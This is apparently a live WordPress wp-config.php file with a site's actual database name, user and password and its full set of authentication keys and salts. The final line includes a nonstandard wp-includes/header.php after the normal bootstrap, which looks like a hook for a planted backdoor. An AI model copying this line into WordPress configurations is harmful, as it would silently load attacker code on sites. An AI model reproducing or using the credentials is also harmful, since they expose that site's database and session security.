/** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the * installation. You don't have to use the web site, you can * copy this file to "wp-config.php" and fill in the values. * * This file contains the following configurations: * * * MySQL settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://codex.wordpress.org/Editing_wp-config.php * * @package WordPress */ // ** MySQL settings ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'unitegh5_a97' ); /** MySQL database username */ define( 'DB_USER', 'unitegh5_a97' ); /** MySQL database password */ define( 'DB_PASSWORD', '5CBFA7D6p2co0t4f9g3q8r1' ); /** MySQL hostname */ define( 'DB_HOST', 'localhost' ); /** Database Charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The Database Collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /** * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', '0PpjG/[8,IuYdgy@^Inw`e F@(?<_tq)tZM!q/A;UWd,qpxgr}kk_mH;#WdUnke`' ); define( 'SECURE_AUTH_KEY', 'N}0`$KH8_9gnMAh[U-s-$%W]`sqQPJ7w-ss>33,X(pTl<=' ); define( 'LOGGED_IN_KEY', 'Ta`Qk5E,52s2Kbj3W{w7MbEsl|k-,Ey2+v3{sQYr.b25%`(|;|1J1NV]I#jDE[,Q' ); define( 'NONCE_KEY', 'qs@Z*_q]s2*lZJmtER_NH_Mu&!p1x4DTKxF-x4}|.q0;j=!@ELldHT,2Z0%`w/E{' ); define( 'AUTH_SALT', '4E!cYmlk_bs-_X2*5+scikayP+Pw?LrY}G<`b)2tKw/z}b8trH,[/Zh2j@VEH%y6' ); define( 'SECURE_AUTH_SALT', 'Ihq}p06>BMoe[opUC|XZol*+/5=Jb+x;*76EAz[=II/Akzuqjc{d1%5dGu$<$.Q}' ); define( 'LOGGED_IN_SALT', 'G:@e9fV9RwvqOH,miva|L9uzTCwOYZRw&>wuts`KuzJKT=hq2a:ul:q:I|XaasZi' ); define( 'NONCE_SALT', '5G-cq]U[@LlQ~cEmO3tM?zW5&q2Rz6%25wBUk*hQ((3}k9,F#D7NR$6wU&>n8W+$' ); define( 'WP_CACHE_KEY_SALT', '8XW:JrXm)7~oQ10)jnUWbDhI(fGF_^){8%K2f~`g<(?Ew*,Q#dNgE`Svb89MPFFR' ); /** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ define( 'WP_CACHE', false ); define( 'WP_AUTO_UPDATE_CORE', true ); $table_prefix = 'a97_'; define( 'AUTOSAVE_INTERVAL', 300 ); define( 'WP_POST_REVISIONS', 5 ); define( 'EMPTY_TRASH_DAYS', 7 ); define( 'WP_CRON_LOCK_TIMEOUT', 120 ); /* That's all, stop editing! Happy blogging. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) define( 'ABSPATH', dirname( __FILE__ ) . '/' ); /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php'; include_once(ABSPATH . WPINC . '/header.php');